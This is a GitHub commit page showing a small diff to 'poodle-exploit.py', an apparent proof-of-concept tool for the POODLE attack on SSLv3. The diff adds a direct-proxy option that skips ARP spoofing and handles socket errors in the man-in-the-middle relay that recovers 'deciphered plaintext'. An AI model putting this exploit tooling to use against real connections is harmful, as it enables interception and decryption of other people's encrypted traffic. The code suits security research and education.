Skip to content

Commit

Permalink
ADD proxy option
Browse files Browse the repository at this point in the history
  • Loading branch information
mpgn committed Jan 31, 2019
1 parent 61f0069 commit 4af0778
Showing 1 changed file with 8 additions and 6 deletions.
14 changes: 8 additions & 6 deletions poodle-exploit.py
Expand Up @@ -149,15 +149,16 @@ def handle(self):
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
connect = True
connect = args.simpleProxy
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
#try:
data = socket_server.recv(1024)
# except socket.error as err:
# break
try:
data = socket_server.recv(1024)
except socket.error as err:
running = False
break
# print 'Server -> proxy -> client'
if len(data) == 0:
running = False
Expand Down Expand Up @@ -239,6 +240,7 @@ def handle(self):
parser.add_argument('rport', type=int, help='port of the remote server')
parser.add_argument('--start-block', type=int, default=1, help='start the attack at this block')
parser.add_argument('--stop-block', type=int, default=0, help='stop the attack at this block')
parser.add_argument('--simpleProxy', type=int, default=0, help='Direct proxy, no ARP spoofing attack')
args = parser.parse_args()

rows, columns = os.popen('stty size', 'r').read().split()
Expand Down Expand Up @@ -298,4 +300,4 @@ def handle(self):
print("Stopping proxy... bye bye")
break

print("\n\033[32m{-} Deciphered plaintext\033[0m :", ('').join(poodle.secret))
print("\n\033[32m{-} Deciphered plaintext\033[0m :", ('').join(poodle.secret))

0 comments on commit 4af0778

Please sign in to comment.